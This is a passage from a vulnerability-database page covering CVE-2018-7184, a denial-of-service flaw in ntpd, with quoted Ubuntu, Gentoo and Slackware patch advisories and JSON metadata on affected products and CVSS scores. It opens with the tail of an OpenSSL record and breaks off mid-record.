"id": "141239" }, { "db": "PACKETSTORM", "id": "134782" }, { "db": "PACKETSTORM", "id": "134859" }, { "db": "PACKETSTORM", "id": "140182" }, { "db": "PACKETSTORM", "id": "134632" }, { "db": "PACKETSTORM", "id": "169632" }, { "db": "CNNVD", "id": "CNNVD-201512-076" }, { "db": "NVD", "id": "CVE-2015-3196" } ] }, "sources": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", "data": { "@container": "@list" } }, "data": [ { "db": "VULMON", "id": "CVE-2015-3196" }, { "db": "BID", "id": "78622" }, { "db": "JVNDB", "id": "JVNDB-2015-006117" }, { "db": "PACKETSTORM", "id": "134652" }, { "db": "PACKETSTORM", "id": "141239" }, { "db": "PACKETSTORM", "id": "134782" }, { "db": "PACKETSTORM", "id": "134859" }, { "db": "PACKETSTORM", "id": "140182" }, { "db": "PACKETSTORM", "id": "134632" }, { "db": "PACKETSTORM", "id": "169632" }, { "db": "CNNVD", "id": "CNNVD-201512-076" }, { "db": "NVD", "id": "CVE-2015-3196" } ] }, "sources_release_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2015-12-06T00:00:00", "db": "VULMON", "id": "CVE-2015-3196" }, { "date": "2015-12-03T00:00:00", "db": "BID", "id": "78622" }, { "date": "2015-12-08T00:00:00", "db": "JVNDB", "id": "JVNDB-2015-006117" }, { "date": "2015-12-07T16:36:58", "db": "PACKETSTORM", "id": "134652" }, { "date": "2017-02-23T17:10:09", "db": "PACKETSTORM", "id": "141239" }, { "date": "2015-12-14T16:39:59", "db": "PACKETSTORM", "id": "134782" }, { "date": "2015-12-16T20:20:47", "db": "PACKETSTORM", "id": "134859" }, { "date": "2016-12-16T16:34:49", "db": "PACKETSTORM", "id": "140182" }, { "date": "2015-12-04T17:22:00", "db": "PACKETSTORM", "id": "134632" }, { "date": "2015-12-03T12:12:12", "db": "PACKETSTORM", "id": "169632" }, { "date": "2015-12-07T00:00:00", "db": "CNNVD", "id": "CNNVD-201512-076" }, { "date": "2015-12-06T20:59:06.913000", "db": "NVD", "id": "CVE-2015-3196" } ] }, "sources_update_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2023-11-07T00:00:00", "db": "VULMON", "id": "CVE-2015-3196" }, { "date": "2017-12-19T22:01:00", "db": "BID", "id": "78622" }, { "date": "2016-05-31T00:00:00", "db": "JVNDB", "id": "JVNDB-2015-006117" }, { "date": "2022-12-14T00:00:00", "db": "CNNVD", "id": "CNNVD-201512-076" }, { "date": "2023-11-07T02:25:31.830000", "db": "NVD", "id": "CVE-2015-3196" } ] }, "threat_type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/threat_type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "remote", "sources": [ { "db": "PACKETSTORM", "id": "134652" }, { "db": "PACKETSTORM", "id": "134782" }, { "db": "CNNVD", "id": "CNNVD-201512-076" } ], "trust": 0.8 }, "title": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/title#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "OpenSSL of ssl/s3_clnt.c Service disruption in (DoS) Vulnerabilities", "sources": [ { "db": "JVNDB", "id": "JVNDB-2015-006117" } ], "trust": 0.8 }, "type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "competition condition problem", "sources": [ { "db": "CNNVD", "id": "CNNVD-201512-076" } ], "trust": 0.6 } }
var-201803-1821
Vulnerability from variot
ntpd in ntp 4.2.8p4 before 4.2.8p11 drops bad packets before updating the "received" timestamp, which allows remote attackers to cause a denial of service (disruption) by sending a packet with a zero-origin timestamp causing the association to reset and setting the contents of the packet as the most recent timestamp. This issue is a result of an incomplete fix for CVE-2015-7704. ntp Contains an input validation vulnerability.Service operation interruption (DoS) There is a possibility of being put into a state. NTP is prone to a denial-of-service vulnerability. An attacker can exploit this issue to cause a denial-of-service condition, denying service to legitimate users. Versions prior to NTP 4.2.8p11 are vulnerable. ntpd is one of the operating system daemons. ========================================================================== Ubuntu Security Notice USN-3707-1 July 09, 2018
ntp vulnerabilities
A security issue affects these releases of Ubuntu and its derivatives:
- Ubuntu 18.04 LTS
- Ubuntu 17.10
- Ubuntu 16.04 LTS
- Ubuntu 14.04 LTS
Summary:
Several security issues were fixed in NTP.
Software Description: - ntp: Network Time Protocol daemon and utility programs
Details:
Yihan Lian discovered that NTP incorrectly handled certain malformed mode 6 packets. This issue only affected Ubuntu 17.10 and Ubuntu 18.04 LTS. (CVE-2018-7182)
Michael Macnair discovered that NTP incorrectly handled certain responses. A remote attacker could possibly use this issue to execute arbitrary code. (CVE-2018-7183)
Miroslav Lichvar discovered that NTP incorrectly handled certain zero-origin timestamps. This issue only affected Ubuntu 17.10 and Ubuntu 18.04 LTS. (CVE-2018-7184)
Miroslav Lichvar discovered that NTP incorrectly handled certain zero-origin timestamps. (CVE-2018-7185)
Update instructions:
The problem can be corrected by updating your system to the following package versions:
Ubuntu 18.04 LTS: ntp 1:4.2.8p10+dfsg-5ubuntu7.1
Ubuntu 17.10: ntp 1:4.2.8p10+dfsg-5ubuntu3.3
Ubuntu 16.04 LTS: ntp 1:4.2.8p4+dfsg-3ubuntu5.9
Ubuntu 14.04 LTS: ntp 1:4.2.6.p5+dfsg-3ubuntu2.14.04.13
In general, a standard system update will make all the necessary changes.
References: https://usn.ubuntu.com/usn/usn-3707-1 CVE-2018-7182, CVE-2018-7183, CVE-2018-7184, CVE-2018-7185
Package Information: https://launchpad.net/ubuntu/+source/ntp/1:4.2.8p10+dfsg-5ubuntu7.1 https://launchpad.net/ubuntu/+source/ntp/1:4.2.8p10+dfsg-5ubuntu3.3 https://launchpad.net/ubuntu/+source/ntp/1:4.2.8p4+dfsg-3ubuntu5.9 https://launchpad.net/ubuntu/+source/ntp/1:4.2.6.p5+dfsg-3ubuntu2.14.04.13 . - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory GLSA 201805-12
https://security.gentoo.org/
Severity: Normal Title: NTP: Multiple vulnerabilities Date: May 26, 2018 Bugs: #649612 ID: 201805-12
Synopsis
Multiple vulnerabilities have been found in NTP, the worst of which could lead to remote code execution.
Affected packages
-------------------------------------------------------------------
Package / Vulnerable / Unaffected
-------------------------------------------------------------------
1 net-misc/ntp < 4.2.8_p11 >= 4.2.8_p11
Description
Multiple vulnerabilities have been discovered in NTP. Please review the CVE identifiers referenced below for details.
Workaround
There is no known workaround at this time.
Resolution
All NTP users should upgrade to the latest version:
# emerge --sync # emerge --ask --oneshot --verbose ">=net-misc/ntp-4.2.8_p11"
References
[ 1 ] CVE-2018-7170 https://nvd.nist.gov/vuln/detail/CVE-2018-7170 [ 2 ] CVE-2018-7182 https://nvd.nist.gov/vuln/detail/CVE-2018-7182 [ 3 ] CVE-2018-7183 https://nvd.nist.gov/vuln/detail/CVE-2018-7183 [ 4 ] CVE-2018-7184 https://nvd.nist.gov/vuln/detail/CVE-2018-7184 [ 5 ] CVE-2018-7185 https://nvd.nist.gov/vuln/detail/CVE-2018-7185
Availability
This GLSA and any updates to it are available for viewing at the Gentoo Security Website:
https://security.gentoo.org/glsa/201805-12
Concerns?
Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users' machines is of utmost importance to us. Any security concerns should be addressed to security@gentoo.org or alternatively, you may file a bug at https://bugs.gentoo.org.
License
Copyright 2018 Gentoo Foundation, Inc; referenced text belongs to its owner(s).
The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license.
https://creativecommons.org/licenses/by-sa/2.5 . -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1
[slackware-security] ntp (SSA:2018-060-02)
New ntp packages are available for Slackware 14.0, 14.1, 14.2, and -current to fix security issues.
Here are the details from the Slackware 14.2 ChangeLog: +--------------------------+ patches/packages/ntp-4.2.8p11-i586-1_slack14.2.txz: Upgraded. This release addresses five security issues in ntpd: * LOW/MEDIUM: Sec 3012 / CVE-2016-1549 / VU#961909: Sybil vulnerability: ephemeral association attack. While fixed in ntp-4.2.8p7, there are significant additional protections for this issue in 4.2.8p11. Reported by Matt Van Gundy of Cisco. * INFO/MEDIUM: Sec 3412 / CVE-2018-7182 / VU#961909: ctl_getitem(): buffer read overrun leads to undefined behavior and information leak. Reported by Yihan Lian of Qihoo 360. * LOW: Sec 3415 / CVE-2018-7170 / VU#961909: Multiple authenticated ephemeral associations. Reported on the questions@ list. * LOW: Sec 3453 / CVE-2018-7184 / VU#961909: Interleaved symmetric mode cannot recover from bad state. Reported by Miroslav Lichvar of Red Hat. * LOW/MEDIUM: Sec 3454 / CVE-2018-7185 / VU#961909: Unauthenticated packet can reset authenticated interleaved association. Reported by Miroslav Lichvar of Red Hat. For more information, see: http://support.ntp.org/bin/view/Main/SecurityNotice#February_2018_ntp_4_2_8p11_NTP_S https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-1549 https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-7182 https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-7170 https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-7184 https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-7185 ( Security fix ) +--------------------------+
Where to find the new packages: +-----------------------------+
Thanks to the friendly folks at the OSU Open Source Lab (http://osuosl.org) for donating FTP and rsync hosting to the Slackware project! :-)
Also see the "Get Slack" section on http://slackware.com for additional mirror sites near you.
Updated package for Slackware 14.0: ftp://ftp.slackware.com/pub/slackware/slackware-14.0/patches/packages/ntp-4.2.8p11-i486-1_slack14.0.txz
Updated package for Slackware x86_64 14.0: ftp://ftp.slackware.com/pub/slackware/slackware64-14.0/patches/packages/ntp-4.2.8p11-x86_64-1_slack14.0.txz
Updated package for Slackware 14.1: ftp://ftp.slackware.com/pub/slackware/slackware-14.1/patches/packages/ntp-4.2.8p11-i486-1_slack14.1.txz
Updated package for Slackware x86_64 14.1: ftp://ftp.slackware.com/pub/slackware/slackware64-14.1/patches/packages/ntp-4.2.8p11-x86_64-1_slack14.1.txz
Updated package for Slackware 14.2: ftp://ftp.slackware.com/pub/slackware/slackware-14.2/patches/packages/ntp-4.2.8p11-i586-1_slack14.2.txz
Updated package for Slackware x86_64 14.2: ftp://ftp.slackware.com/pub/slackware/slackware64-14.2/patches/packages/ntp-4.2.8p11-x86_64-1_slack14.2.txz
Updated package for Slackware -current: ftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/n/ntp-4.2.8p11-i586-1.txz
Updated package for Slackware x86_64 -current: ftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/n/ntp-4.2.8p11-x86_64-1.txz
MD5 signatures: +-------------+
Slackware 14.0 package: 01c86ddfabec68d52877336258d064c7 ntp-4.2.8p11-i486-1_slack14.0.txz
Slackware x86_64 14.0 package: b2d36d96f9a4d84df3586d38b8b47389 ntp-4.2.8p11-x86_64-1_slack14.0.txz
Slackware 14.1 package: 78b4e9221e725dcb45160950bfc926d0 ntp-4.2.8p11-i486-1_slack14.1.txz
Slackware x86_64 14.1 package: e0d32ed484e02ad28c59838e6407d549 ntp-4.2.8p11-x86_64-1_slack14.1.txz
Slackware 14.2 package: 81690d8e511b403f0fe89c1d120f5049 ntp-4.2.8p11-i586-1_slack14.2.txz
Slackware x86_64 14.2 package: d2c877e3d1b9c7ce003ef090c7610c74 ntp-4.2.8p11-x86_64-1_slack14.2.txz
Slackware -current package: c3ee95d3944b09c2e891883dc5411a6f n/ntp-4.2.8p11-i586-1.txz
Slackware x86_64 -current package: fa9c7a8aca0c769791e34a8e48e6d260 n/ntp-4.2.8p11-x86_64-1.txz
Installation instructions: +------------------------+
Upgrade the package as root:
upgradepkg ntp-4.2.8p11-i586-1_slack14.2.txz
Then, restart the NTP daemon:
sh /etc/rc.d/rc.ntpd restart
+-----+
Slackware Linux Security Team http://slackware.com/gpg-key security@slackware.com
+------------------------------------------------------------------------+ | To leave the slackware-security mailing list: | +------------------------------------------------------------------------+ | Send an email to majordomo@slackware.com with this text in the body of | | the email message: | | | | unsubscribe slackware-security | | | | You will get a confirmation message back containing instructions to | | complete the process. Please do not reply to this email address. | +------------------------------------------------------------------------+ -----BEGIN PGP SIGNATURE-----
iEYEARECAAYFAlqYjI8ACgkQakRjwEAQIjM5rACfdDAWRxL2nQATj8HFDPgCVInK 13MAnR04OluKfiEsJVgO6uWJKXy2HOGq =FRx7 -----END PGP SIGNATURE-----
Show details on source website{ "@context": { "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#", "affected_products": { "@id": "https://www.variotdbs.pl/ref/affected_products" }, "configurations": { "@id": "https://www.variotdbs.pl/ref/configurations" }, "credits": { "@id": "https://www.variotdbs.pl/ref/credits" }, "cvss": { "@id": "https://www.variotdbs.pl/ref/cvss/" }, "description": { "@id": "https://www.variotdbs.pl/ref/description/" }, "exploit_availability": { "@id": "https://www.variotdbs.pl/ref/exploit_availability/" }, "external_ids": { "@id": "https://www.variotdbs.pl/ref/external_ids/" }, "iot": { "@id": "https://www.variotdbs.pl/ref/iot/" }, "iot_taxonomy": { "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/" }, "patch": { "@id": "https://www.variotdbs.pl/ref/patch/" }, "problemtype_data": { "@id": "https://www.variotdbs.pl/ref/problemtype_data/" }, "references": { "@id": "https://www.variotdbs.pl/ref/references/" }, "sources": { "@id": "https://www.variotdbs.pl/ref/sources/" }, "sources_release_date": { "@id": "https://www.variotdbs.pl/ref/sources_release_date/" }, "sources_update_date": { "@id": "https://www.variotdbs.pl/ref/sources_update_date/" }, "threat_type": { "@id": "https://www.variotdbs.pl/ref/threat_type/" }, "title": { "@id": "https://www.variotdbs.pl/ref/title/" }, "type": { "@id": "https://www.variotdbs.pl/ref/type/" } }, "@id": "https://www.variotdbs.pl/vuln/VAR-201803-1821", "affected_products": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/affected_products#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "model": "ntp", "scope": "eq", "trust": 1.9, "vendor": "ntp", "version": "4.2.8" }, { "model": "linux", "scope": "eq", "trust": 1.0, "vendor": "slackware", "version": "14.1" }, { "model": "ubuntu linux", "scope": "eq", "trust": 1.0, "vendor": "canonical", "version": "17.10" }, { "model": "skynas", "scope": "eq", "trust": 1.0, "vendor": "synology", "version": null }, { "model": "ubuntu linux", "scope": "eq", "trust": 1.0, "vendor": "canonical", "version": "18.04" }, { "model": "diskstation manager", "scope": "eq", "trust": 1.0, "vendor": "synology", "version": "6.1" }, { "model": "cloud backup", "scope": "eq", "trust": 1.0, "vendor": "netapp", "version": null }, { "model": "steelstore cloud integrated storage", "scope": "eq", "trust": 1.0, "vendor": "netapp", "version": null }, { "model": "virtual diskstation manager", "scope": "eq", "trust": 1.0, "vendor": "synology", "version": null }, { "model": "diskstation manager", "scope": "eq", "trust": 1.0, "vendor": "synology", "version": "6.0" }, { "model": "vs960hd", "scope": "eq", "trust": 1.0, "vendor": "synology", "version": null }, { "model": "router manager", "scope": "eq", "trust": 1.0, "vendor": "synology", "version": "1.1" }, { "model": "linux", "scope": "eq", "trust": 1.0, "vendor": "slackware", "version": "14.2" }, { "model": "linux", "scope": "eq", "trust": 1.0, "vendor": "slackware", "version": "14.0" }, { "model": "ubuntu linux", "scope": "eq", "trust": 1.0, "vendor": "canonical", "version": "14.04" }, { "model": "ubuntu linux", "scope": "eq", "trust": 1.0, "vendor": "canonical", "version": "16.04" }, { "model": "diskstation manager", "scope": "eq", "trust": 1.0, "vendor": "synology", "version": "5.2" }, { "model": "ntp", "scope": "lt", "trust": 0.8, "vendor": "ntp", "version": "4.2.8p4 thats all 4.2.8p11" }, { "model": "linux", "scope": null, "trust": 0.8, "vendor": "slackware", "version": null }, { "model": "diskstation manager", "scope": null, "trust": 0.8, "vendor": "synology", "version": null }, { "model": "router manager", "scope": null, "trust": 0.8, "vendor": "synology", "version": null }, { "model": "skynas", "scope": null, "trust": 0.8, "vendor": "synology", "version": null }, { "model": "virtual diskstation manager", "scope": null, "trust": 0.8, "vendor": "synology", "version": null }, { "model": "vs960hd", "scope": null, "trust": 0.8, "vendor": "synology", "version": null }, { "model": "solaris", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "11.3" }, { "model": "ntp", "scope": "eq", "trust": 0.3, "vendor": "ntp", "version": "4.2.6" }, { "model": "p74", "scope": "eq", "trust": 0.3, "vendor": "ntp", "version": "4.2.5" }, { "model": "p153", "scope": "eq", "trust": 0.3, "vendor": "ntp", "version": "4.2.5" }, { "model": "p150", "scope": "eq", "trust": 0.3, "vendor": "ntp", "version": "4.2.5" }, { "model": "p8", "scope": "eq", "trust": 0.3, "vendor": "ntp", "version": "4.2.4" }, { "model": "p7", "scope": "eq", "trust": 0.3, "vendor": "ntp", "version": "4.2.4" }, { "model": "p6", "scope": "eq", "trust": 0.3, "vendor": "ntp", "version": "4.2.4" }, { "model": "p5", "scope": "eq", "trust": 0.3, "vendor": "ntp", "version": "4.2.4" }, { "model": "p4", "scope": "eq", "trust": 0.3, "vendor": "ntp", "version": "4.2.4" }, { "model": "p4", "scope": "eq", "trust": 0.3, "vendor": "ntp", "version": "4.2.2" }, { "model": "p1", "scope": "eq", "trust": 0.3, "vendor": "ntp", "version": "4.2.2" }, { "model": "4.2.8p9", "scope": null, "trust": 0.3, "vendor": "ntp", "version": null }, { "model": "4.2.8p8", "scope": null, "trust": 0.3, "vendor": "ntp", "version": null }, { "model": "4.2.8p7", "scope": null, "trust": 0.3, "vendor": "ntp", "version": null }, { "model": "4.2.8p6", "scope": null, "trust": 0.3, "vendor": "ntp", "version": null }, { "model": "4.2.8p5", "scope": null, "trust": 0.3, "vendor": "ntp", "version": null }, { "model": "4.2.8p4", "scope": null, "trust": 0.3, "vendor": "ntp", "version": null }, { "model": "4.2.8p3", "scope": null, "trust": 0.3, "vendor": "ntp", "version": null }, { "model": "4.2.8p2", "scope": null, "trust": 0.3, "vendor": "ntp", "version": null }, { "model": "4.2.8p10", "scope": null, "trust": 0.3, "vendor": "ntp", "version": null }, { "model": "4.2.8p1", "scope": null, "trust": 0.3, "vendor": "ntp", "version": null }, { "model": "4.2.7p385", "scope": null, "trust": 0.3, "vendor": "ntp", "version": null }, { "model": "4.2.7p366", "scope": null, "trust": 0.3, "vendor": "ntp", "version": null }, { "model": "4.2.7p22", "scope": null, "trust": 0.3, "vendor": "ntp", "version": null }, { "model": "4.2.7p111", "scope": null, "trust": 0.3, "vendor": "ntp", "version": null }, { "model": "4.2.7p11", "scope": null, "trust": 0.3, "vendor": "ntp", "version": null }, { "model": "4.2.5p3", "scope": null, "trust": 0.3, "vendor": "ntp", "version": null }, { "model": "4.2.5p203", "scope": null, "trust": 0.3, "vendor": "ntp", "version": null }, { "model": "4.2.5p186", "scope": null, "trust": 0.3, "vendor": "ntp", "version": null }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.3" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.14" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.4.0" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.3.50" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.3.4" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.3.3" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.3.2" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.3.0" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.2.6" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.2.5" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.2.4" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.2.0" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.1.3" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.1.1" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.1.0" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.0.13" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.0.12" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.0.11" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.0.10" }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2" }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1" }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1" }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.3" }, { "model": "4.2.8p11", "scope": "ne", "trust": 0.3, "vendor": "ntp", "version": null } ], "sources": [ { "db": "BID", "id": "103192" }, { "db": "JVNDB", "id": "JVNDB-2018-002749" }, { "db": "NVD", "id": "CVE-2018-7184" }, { "db": "CNNVD", "id": "CNNVD-201803-142" } ] }, "configurations": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/configurations#", "children": { "@container": "@list" }, "cpe_match": { "@container": "@list" }, "data": { "@container": "@list" }, "nodes": { "@container": "@list" } }, "data": [ { "CVE_data_version": "4.0", "nodes": [ { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:a:ntp:ntp:4.2.8:p4:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:ntp:ntp:4.2.8:p5:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:ntp:ntp:4.2.8:p6:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:ntp:ntp:4.2.8:p7:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:ntp:ntp:4.2.8:p9:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:ntp:ntp:4.2.8:p8:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:ntp:ntp:4.2.8:p10:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true } ], "operator": "OR" }, { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:a:synology:skynas:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:synology:router_manager:1.1:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:synology:diskstation_manager:6.1:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:synology:diskstation_manager:6.0:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:synology:virtual_diskstation_manager:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:synology:diskstation_manager:5.2:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true } ], "operator": "OR" }, { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:o:synology:vs960hd_firmware:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true } ], "operator": "OR" }, { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:o:slackware:slackware_linux:14.0:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:slackware:slackware_linux:14.1:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:slackware:slackware_linux:14.2:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true } ], "operator": "OR" }, { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:o:canonical:ubuntu_linux:14.04:*:*:*:lts:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:canonical:ubuntu_linux:16.04:*:*:*:lts:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:canonical:ubuntu_linux:17.10:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:canonical:ubuntu_linux:18.04:*:*:*:lts:*:*:*", "cpe_name": [], "vulnerable": true } ], "operator": "OR" }, { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:a:netapp:steelstore_cloud_integrated_storage:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:netapp:cloud_backup:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true } ], "operator": "OR" } ] } ], "sources": [ { "db": "NVD", "id": "CVE-2018-7184" } ] }, "credits": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/credits#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "unknown", "sources": [ { "db": "BID", "id": "103192" } ], "trust": 0.3 }, "cve": "CVE-2018-7184", "cvss": { "@context": { "cvssV2": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2" }, "cvssV3": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/" }, "severity": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/cvss/severity#" }, "@id": "https://www.variotdbs.pl/ref/cvss/severity" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "cvssV2": [ { "acInsufInfo": false, "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "NVD", "availabilityImpact": "PARTIAL", "baseScore": 5.0, "confidentialityImpact": "NONE", "exploitabilityScore": 10.0, "impactScore": 2.9, "integrityImpact": "NONE", "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "trust": 1.0, "userInteractionRequired": false, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0" }, { "acInsufInfo": null, "accessComplexity": "Low", "accessVector": "Network", "authentication": "None", "author": "NVD", "availabilityImpact": "Partial", "baseScore": 5.0, "confidentialityImpact": "None", "exploitabilityScore": null, "id": "CVE-2018-7184", "impactScore": null, "integrityImpact": "None", "obtainAllPrivilege": null, "obtainOtherPrivilege": null, "obtainUserPrivilege": null, "severity": "Medium", "trust": 0.8, "userInteractionRequired": null, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0" }, { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "VULHUB", "availabilityImpact": "PARTIAL", "baseScore": 5.0, "confidentialityImpact": "NONE", "exploitabilityScore": 10.0, "id": "VHN-137216", "impactScore": 2.9, "integrityImpact": "NONE", "severity": "MEDIUM", "trust": 0.1, "vectorString": "AV:N/AC:L/AU:N/C:N/I:N/A:P", "version": "2.0" } ], "cvssV3": [ { "attackComplexity": "LOW", "attackVector": "NETWORK", "author": "NVD", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "exploitabilityScore": 3.9, "impactScore": 3.6, "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "trust": 1.0, "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.0" }, { "attackComplexity": "Low", "attackVector": "Network", "author": "NVD", "availabilityImpact": "High", "baseScore": 7.5, "baseSeverity": "High", "confidentialityImpact": "None", "exploitabilityScore": null, "id": "CVE-2018-7184", "impactScore": null, "integrityImpact": "None", "privilegesRequired": "None", "scope": "Unchanged", "trust": 0.8, "userInteraction": "None", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.0" } ], "severity": [ { "author": "NVD", "id": "CVE-2018-7184", "trust": 1.8, "value": "HIGH" }, { "author": "CNNVD", "id": "CNNVD-201803-142", "trust": 0.6, "value": "HIGH" }, { "author": "VULHUB", "id": "VHN-137216", "trust": 0.1, "value": "MEDIUM" } ] } ], "sources": [ { "db": "VULHUB", "id": "VHN-137216" }, { "db": "JVNDB", "id": "JVNDB-2018-002749" }, { "db": "NVD", "id": "CVE-2018-7184" }, { "db": "CNNVD", "id": "CNNVD-201803-142" } ] }, "description": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/description#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "ntpd in ntp 